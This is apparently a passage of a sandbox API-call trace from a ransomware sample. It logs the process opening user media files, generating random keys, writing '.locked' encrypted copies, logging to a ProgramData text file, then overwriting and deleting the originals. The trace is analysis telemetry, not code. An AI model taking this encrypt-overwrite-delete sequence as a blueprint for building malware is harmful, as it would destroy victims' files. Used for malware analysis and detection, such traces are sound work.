(hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0312.423] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.424] SetEvent (hEvent=0x1ac) returned 1 [0312.424] SetEvent (hEvent=0x134) returned 1 [0312.424] SetEvent (hEvent=0x14c) returned 1 [0312.424] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.426] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0312.426] SetEvent (hEvent=0x14c) returned 1 [0312.426] SetEvent (hEvent=0x134) returned 1 [0312.427] SetEvent (hEvent=0x184) returned 1 [0312.427] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0312.488] SetEvent (hEvent=0x198) returned 1 [0312.488] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.397] SetEvent (hEvent=0x214) returned 1 [0313.397] SetEvent (hEvent=0x184) returned 1 [0313.397] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.400] SetEvent (hEvent=0x214) returned 1 [0313.400] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.444] SetEvent (hEvent=0x14c) returned 1 [0313.444] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.495] SetEvent (hEvent=0x20c) returned 1 [0313.495] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.502] SetEvent (hEvent=0x22c) returned 1 [0313.502] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.504] SetEvent (hEvent=0x20c) returned 1 [0313.504] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.520] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0313.527] SetEvent (hEvent=0x14c) returned 1 [0313.527] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0314.636] SetEvent (hEvent=0x14c) returned 1 [0314.636] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc0c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x17057a24, lpReserved=0x0 | out: lpBuffer=0x125fc0c0*, lpNumberOfCharsWritten=0x17057a24*=0xc) returned 1 [0314.673] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0314.760] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\tuzhdj4RVGB0Q7rL.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\tuzhdj4rvgb0q7rl.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.761] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x17057d9c | out: lpMode=0x17057d9c) returned 0 [0314.761] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\tuzhdj4RVGB0Q7rL.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\tuzhdj4rvgb0q7rl.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0314.762] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x17057d9c | out: lpMode=0x17057d9c) returned 0 [0314.762] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0314.762] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0314.762] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0314.762] WriteFile (in: hFile=0x1a4, lpBuffer=0x12718000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x17057d78, lpOverlapped=0x0 | out: lpBuffer=0x12718000*, lpNumberOfBytesWritten=0x17057d78*=0x80, lpOverlapped=0x0) returned 1 [0314.768] ReadFile (in: hFile=0x1e0, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x17057d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x17057d68*=0x2c4d, lpOverlapped=0x0) returned 1 [0314.770] WriteFile (in: hFile=0x1a4, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0x2c4d, lpNumberOfBytesWritten=0x17057d74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x17057d74*=0x2c4d, lpOverlapped=0x0) returned 1 [0314.819] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0314.827] SetEvent (hEvent=0x14c) returned 1 [0314.827] ReadFile (in: hFile=0x1e0, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x17057d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x17057d68*=0x0, lpOverlapped=0x0) returned 1 [0314.828] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0314.940] CloseHandle (hObject=0x1a4) returned 1 [0314.944] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.055] CloseHandle (hObject=0x1e0) returned 1 [0315.055] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.086] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.087] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x17057e94 | out: lpMode=0x17057e94) returned 0 [0315.087] WriteFile (in: hFile=0x218, lpBuffer=0x126d20c0*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x17057e64, lpOverlapped=0x0 | out: lpBuffer=0x126d20c0*, lpNumberOfBytesWritten=0x17057e64*=0x5c, lpOverlapped=0x0) returned 1 [0315.087] CloseHandle (hObject=0x218) returned 1 [0315.087] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\tuzhdj4RVGB0Q7rL.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\tuzhdj4rvgb0q7rl.gif")) returned 1 [0315.136] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.404] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\tuzhdj4RVGB0Q7rL.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\tuzhdj4rvgb0q7rl.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0315.410] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.440] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x17057e88 | out: lpMode=0x17057e88) returned 0 [0315.440] WriteFile (in: hFile=0x224, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x17057e78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x17057e78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.468] CloseHandle (hObject=0x224) returned 1 [0315.468] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\tuzhdj4RVGB0Q7rL.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\tuzhdj4rvgb0q7rl.gif")) returned 1 [0315.476] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.574] SetEvent (hEvent=0x22c) returned 1 [0315.574] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.592] SetEvent (hEvent=0x1e8) returned 1 [0315.592] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0315.792] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\6FI0Bk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\6fi0bk.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0315.952] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0316.092] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125dee88 | out: lpMode=0x125dee88) returned 0 [0316.092] WriteFile (in: hFile=0x224, lpBuffer=0x14dc2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dee78, lpOverlapped=0x0 | out: lpBuffer=0x14dc2000*, lpNumberOfBytesWritten=0x125dee78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.114] CloseHandle (hObject=0x224) returned 1 [0316.115] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\6FI0Bk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\6fi0bk.gif")) returned 1 [0316.163] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0316.384] SetEvent (hEvent=0x190) returned 1 [0316.384] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0316.393] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0317.515] SetEvent (hEvent=0x20c) returned 1 [0317.515] SetEvent (hEvent=0x1e8) returned 1 [0317.515] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0317.989] SetEvent (hEvent=0x134) returned 1 [0317.989] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.058] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.077] SetEvent (hEvent=0x1ac) returned 1 [0318.077] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.252] SetEvent (hEvent=0x198) returned 1 [0318.252] SetEvent (hEvent=0x14c) returned 1 [0318.252] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.255] SetEvent (hEvent=0x1f0) returned 1 [0318.255] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.259] SetEvent (hEvent=0x12c) returned 1 [0318.259] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.304] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.498] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.504] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.533] SetEvent (hEvent=0x14c) returned 1 [0318.534] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.540] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.542] SetEvent (hEvent=0x22c) returned 1 [0318.542] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.578] SetEvent (hEvent=0x12c) returned 1 [0318.578] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0318.895] SetEvent (hEvent=0x1ac) returned 1 [0318.896] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\tkHozG_R-B1rJV9S7Ic.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\tkhozg_r-b1rjv9s7ic.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0318.896] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125dbd9c | out: lpMode=0x125dbd9c) returned 0 [0318.896] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\tkHozG_R-B1rJV9S7Ic.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\tkhozg_r-b1rjv9s7ic.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0318.927] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0319.256] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125dbd9c | out: lpMode=0x125dbd9c) returned 0 [0319.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0319.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8040 | out: pbBuffer=0x124a8040) returned 1 [0319.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702481 | out: pbBuffer=0x12702481) returned 1 [0319.256] WriteFile (in: hFile=0x23c, lpBuffer=0x16cd4000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x16cd4000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0319.258] VirtualAlloc (lpAddress=0x18850000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x18850000 [0319.336] VirtualAlloc (lpAddress=0x10a1e000, dwSize=0x9c000, flAllocationType=0x1000, flProtect=0x4) returned 0x10a1e000 [0319.338] VirtualAlloc (lpAddress=0x2172000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2172000 [0319.467] ReadFile (in: hFile=0x1f4, lpBuffer=0x1883c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x1883c000*, lpNumberOfBytesRead=0x12667d68*=0xf871, lpOverlapped=0x0) returned 1 [0319.471] WriteFile (in: hFile=0x23c, lpBuffer=0x1883c000*, nNumberOfBytesToWrite=0xf871, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x1883c000*, lpNumberOfBytesWritten=0x12667d74*=0xf871, lpOverlapped=0x0) returned 1 [0319.630] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0319.854] ReadFile (in: hFile=0x1f4, lpBuffer=0x1883c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x1883c000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0319.854] CloseHandle (hObject=0x23c) returned 1 [0320.118] CloseHandle (hObject=0x1f4) returned 1 [0320.118] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.118] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12667e94 | out: lpMode=0x12667e94) returned 0 [0320.118] WriteFile (in: hFile=0x1f4, lpBuffer=0x12352140*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x12667e64, lpOverlapped=0x0 | out: lpBuffer=0x12352140*, lpNumberOfBytesWritten=0x12667e64*=0x47, lpOverlapped=0x0) returned 1 [0320.118] CloseHandle (hObject=0x1f4) returned 1 [0320.119] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\tkHozG_R-B1rJV9S7Ic.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\tkhozg_r-b1rjv9s7ic.swf")) returned 1 [0320.432] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.437] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.439] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.486] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0320.487] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0320.487] SetEvent (hEvent=0x150) returned 1 [0320.487] SetEvent (hEvent=0x1ac) returned 1 [0320.487] SetEvent (hEvent=0x220) returned 1 [0320.487] SetEvent (hEvent=0x21c) returned 1 [0320.494] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0320.495] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0320.496] SetEvent (hEvent=0x190) returned 1 [0320.496] SetEvent (hEvent=0x22c) returned 1 [0320.496] SetEvent (hEvent=0x21c) returned 1 [0320.496] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.497] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0320.497] SetEvent (hEvent=0x150) returned 1 [0320.497] SetEvent (hEvent=0x21c) returned 1 [0320.497] SetEvent (hEvent=0x22c) returned 1 [0320.497] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\MCHoHyAA18 aW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\mchohyaa18 aw.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0320.502] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.511] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0320.511] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.863] WriteFile (in: hFile=0x1a4, lpBuffer=0x17726000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x17726000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.888] CloseHandle (hObject=0x1a4) returned 1 [0320.903] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.945] SetEvent (hEvent=0x14c) returned 1 [0320.945] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.949] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.954] SetEvent (hEvent=0x1ac) returned 1 [0320.954] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0320.999] SetEvent (hEvent=0x21c) returned 1 [0320.999] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) Thread: id = 443 os_tid = 0xb74 [0260.713] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33ceff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33ceff58*=0x1ec) returned 1 [0260.713] SetEvent (hEvent=0x1d0) returned 1 [0260.713] SetEvent (hEvent=0x134) returned 1 [0260.713] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f0 [0260.713] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.715] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.719] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.832] SetEvent (hEvent=0x184) returned 1 [0260.832] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.851] SetEvent (hEvent=0x1dc) returned 1 [0260.851] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0260.856] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.856] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0260.856] SetEvent (hEvent=0x1e8) returned 1 [0260.856] SetEvent (hEvent=0x1dc) returned 1 [0260.856] SetEvent (hEvent=0x134) returned 1 [0260.856] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0260.857] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0260.857] SetEvent (hEvent=0x150) returned 1 [0260.857] SetEvent (hEvent=0x134) returned 1 [0260.857] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0260.859] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_273Oz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_273oz.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0260.859] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0260.859] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_273Oz.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_273oz.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0261.834] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0262.409] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0262.409] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0262.409] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0262.409] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0262.409] WriteFile (in: hFile=0x200, lpBuffer=0x1267d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x1267d000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0262.413] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0262.422] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0262.422] SetEvent (hEvent=0x150) returned 1 [0262.422] SetEvent (hEvent=0x1e8) returned 1 [0262.422] SetEvent (hEvent=0x104) returned 1 [0262.422] SetEvent (hEvent=0x1d0) returned 1 [0262.422] ReadFile (in: hFile=0x1bc, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1239fd68*=0x78f7, lpOverlapped=0x0) returned 1 [0262.425] WriteFile (in: hFile=0x200, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0x78f7, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x1239fd74*=0x78f7, lpOverlapped=0x0) returned 1 [0262.430] ReadFile (in: hFile=0x1bc, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0262.430] CloseHandle (hObject=0x200) returned 1 [0262.433] CloseHandle (hObject=0x1bc) returned 1 [0262.434] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0262.583] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0262.583] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0262.817] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0262.817] SetEvent (hEvent=0x134) returned 1 [0262.817] SetEvent (hEvent=0x21c) returned 1 [0262.817] SetEvent (hEvent=0x1d0) returned 1 [0262.817] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0262.903] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0262.903] SetEvent (hEvent=0x150) returned 1 [0262.903] SetEvent (hEvent=0x134) returned 1 [0262.903] SetEvent (hEvent=0x21c) returned 1 [0262.903] SetEvent (hEvent=0x1d0) returned 1 [0262.904] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0262.904] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1235fe94 | out: lpMode=0x1235fe94) returned 0 [0262.904] WriteFile (in: hFile=0x1bc, lpBuffer=0x1263c060*, nNumberOfBytesToWrite=0x2e, 